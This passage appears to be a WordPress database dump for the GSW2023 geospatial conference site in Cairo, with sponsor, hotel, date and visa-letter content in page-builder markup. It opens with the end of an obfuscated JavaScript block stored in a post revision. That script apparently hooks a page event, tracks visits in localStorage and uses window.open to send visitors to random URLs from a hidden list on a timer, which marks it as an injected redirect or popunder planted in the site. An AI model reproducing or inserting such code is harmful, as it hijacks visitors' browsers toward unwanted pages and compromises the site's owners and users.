_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-27 06:46:55','2023-06-27 06:46:55','',3066,'https://gsw2023.com/?p=4847',0,'revision','',0),
(4848,4,'2023-06-27 06:50:08','2023-06-27 06:50:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo 